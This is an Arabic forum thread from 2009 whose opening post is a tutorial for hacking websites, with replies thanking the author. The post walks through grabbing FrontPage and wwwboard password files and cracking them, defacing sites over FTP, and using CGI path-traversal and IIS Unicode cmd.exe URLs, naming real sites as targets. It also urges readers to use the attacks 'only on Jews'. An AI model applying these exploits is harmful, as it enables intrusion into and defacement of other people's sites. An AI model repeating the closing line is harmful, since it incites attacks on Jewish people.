الرئيسيةالبوابةبحـثدخولالتسجيل

شاطر | 
 

 اسهل طرق اختراق المواقع ادخل واتعلم و شرح الثغرات واستغلالها

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
abeka
مشرف
مشرف


ذكر عدد الرسائل : 679
البلد : alger
الجنس : ذكر
البلد : الجزائر
. :
دعاء :
تاريخ التسجيل : 17/02/2009

مُساهمةموضوع: اسهل طرق اختراق المواقع ادخل واتعلم و شرح الثغرات واستغلالها   الأحد مارس 22, 2009 12:42 pm



بسم الله الرحمن الرحيم




السلام عليكم ورحمة الله وبركــــــاته




تحياتي الى الأدارة والمشرفين والأعضـــاء




أرجو التثبيت الموضوع رجأ





شرح الثغرات واستغلالها
1 - شرح ثغرة الفرونت بيج وكيفية استغلالها:

ثغرة الفرونت بيج هي ثغرة منتشرة جدا بين المواقع وتأتي عادة بهذا الشكل


http://www.****.com/_vti_pvt

يعني الثغرة هي
_vti_pvt
ومن خلال هذه الثغرة تظهر لك ملفات الموقع (الفرونت بيج) او المشرف

ملاحظة:-
تنفذ الثغرة وتوجد على المواقع التي صممت بالفرونت بيج ولا تصلح لغيرها
لتعرق اذا الموقع مصمم بالفرونت بيج من موقع


http://www.netcraft.net/

تدخل الموقع تشوف قدامك مستطيل أدخل الموقع اللي تبي تجمع معلومات حوله
ويهمنا ملف واحد ومن غيره لانستفيد شيئا وهو
service.pwd
نفتحه بالمفكرة وتشوف الباسوورد لكن هاي الباسوورد مشفرة وتكون بهذا الشكل
-FrontPage-
ekendall:bYld1Sr73NLKo
louisa:5zm94d7cdDFiQ
هنا نرى ان الموقع عليه مشرفين
ekendall
و
louisa
نفك التشفير بواسطة برنامج جون ذا ريبر طبعا وبعد فك التشفير بالجون ذا ريبر تروح للفرونت بيج
file
open web
وتحط الموقع فتطلعلك الصفحة الرئيسية فغير اللي بدك اياه بعدين
save or publish
بعدين بيطلب منك كلمة السر والاسم طبعا الشغلة سهلة تحط الاسم وكلمة السر وتحط
sign
وهذا موقع للتطبيق

http://www.heyerlist.org/garderobe/_vti_pvt

-------------------------------------------------------------------
2 - شرح ثغرة ملف الباسوورد وكيفية استغلالها:


ثغرة الـ
WWWBoard
هي أسهل ثغرة بالإضافة إلى الفرونت بيج.
لنفترض أن الموقع المراد إختراقه هو

http://www.boardprep.net/

لنضف إليه
wwwboard/passwd.txt
فيصبح العنوان

http://www.boardprep.net/wwwboard/passwd.txt
نفتح العنوان سوف تجد
cknouse:aexMVWnDOyrdE
كلمة المرور+ إسم المستخدم
يعني إسم المستخدم هو
cknouse
وكلمة المرور هي
aexMVWnDOyrdE
فك تشفيره بجون ذي ريبر الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية
روح للفتب وإكتب ftp.domen.com
ملاحظة إستبدل
domen.com
بإسم الموقع إلي عندك باسوورده
وحط اليوزر نيم والباسوورد وإدخل على الموقع أنشئ صفحة بإسم
index.html
وإرفعها للموقع
لتحميل الفتب

http://members.home.nl/patrick.pagina/temp/Ws-ftp32.zip

- شرح ثغرة سي جي اي وكيفية استغلالها:

CGI bugs
وبعضها يمكن استخدامها مباشرة من المتصفح مثل اليونيكود وبعض ثغرات السي جي آي
ولكن بعض أو أكثر ثغرات المتصفح يتم التأكد فقط من وجودها من خلال المتصفح.
الثغرات التي يمكن استغلالها من المتصفح مباشرة مثل
/cgi-bin/passwd.txt
إذا كان الموقع هو

http://www.somesite.com/
فتكتب الثغرة هكذا في المتفح
http://www.somesite.com/cgi-bin/passwd.txt
هذه الثغرة تعرض لك أسماء المستخدمين وكلمات
المرور للمستخدمين للموقع مثل المدير وكل من يسمح له بدخول قاعدة بيانات الموقع
طبعا لا تحاول تجربة هذه الثغرة الآن ...إلا إذا كنت تريد اختراق موقع في زيمبابوي نسيه أصحابه من 10 سنين حتى هذه الثغرة يمكن الا تصلح معهم لانها صارت معروفة.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
استغلال العيب في ملفات
Cgi & Perl
للوصول الى
etc/passwd

اولا: سناخذ الثغرات من نوع
Show Files
اولا عند وجود هذا الملف
/cgi-bin/apexec.pl?
الباسوورد علينا استغلال هذه الثغرة للوصول الى

http://www.target.com/
../../../../../etc/resolv.conf%00.html&passurl=/category/
مع امكانية تغيير
path
بالملف المراد
هذا من جهة البيرل ونفس الكلام ينطبق على السي جي اي
/cgi-bin/hsx.cgi?
عند وجود هذا الملف في
/cgi-bin/
طبق الثغرة التالية

http://www.target.com/cgi-bin/hsx.c..../etc/passwd
الطريقة المثلى للبحث عن هذه الملفات اما بالاختراق العشوائي او عن استخدام برنامج سكان للبحث عن ثغرات في الموقع ضع هذه الملفات ضمن لائحة الثغرات
مثل /cgi-bin/hsx.cgi?
وعند وجوده يتم تطبيق ثغرته.
-------------------------------------------------------------------
4 - شرح ثغرة اي اي اس وكيفية استغلالها:

IIS = Inetnet Information Service
و نستخدم ثغراته المعروفه باليونيكودز
Unicodes
و هي كثيره جدا و انا اعني ما اقول
مثل :
**********************************************

http://www.xxxx.com/scripts/..&Aacu...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Agra...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Agra...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Agra...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Aacu...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Aacu...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Aacu.../cmd.exe?/c+dir

+c:
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
أرجو التطبيق على اليهود فقط اللهم بلغت اللهم فاشهد

لاتبخلو عليه بكلمة شكر او رد

_________________
tewfik
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
القائد
اداري
اداري


ذكر عدد الرسائل : 1287
العمر : 41
البلد : الجزائر
الجنس : ذكر
البلد : الجزائر
. :
دعاء :
تاريخ التسجيل : 22/05/2008

مُساهمةموضوع: رد: اسهل طرق اختراق المواقع ادخل واتعلم و شرح الثغرات واستغلالها   السبت مارس 28, 2009 9:03 pm

بااااااارك الله فيك اخي وجزاك الله الف خير سيتم التثبيت

_________________
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://dz-blanche.yoo7.com
نجمة السماء
مراقبة
مراقبة


انثى عدد الرسائل : 281
العمر : 20
البلد : الجزائر
الجنس : أنثى
البلد : الجزائر
. :
دعاء :
تاريخ التسجيل : 11/04/2011

مُساهمةموضوع: رد: اسهل طرق اختراق المواقع ادخل واتعلم و شرح الثغرات واستغلالها   الخميس يونيو 23, 2011 5:11 pm

شكرا اخي بارك الله فيك

_________________
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
 
اسهل طرق اختراق المواقع ادخل واتعلم و شرح الثغرات واستغلالها
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
 :: * * * الكمبـــيوتــــــر * * * :: الأمن والحماية-
انتقل الى: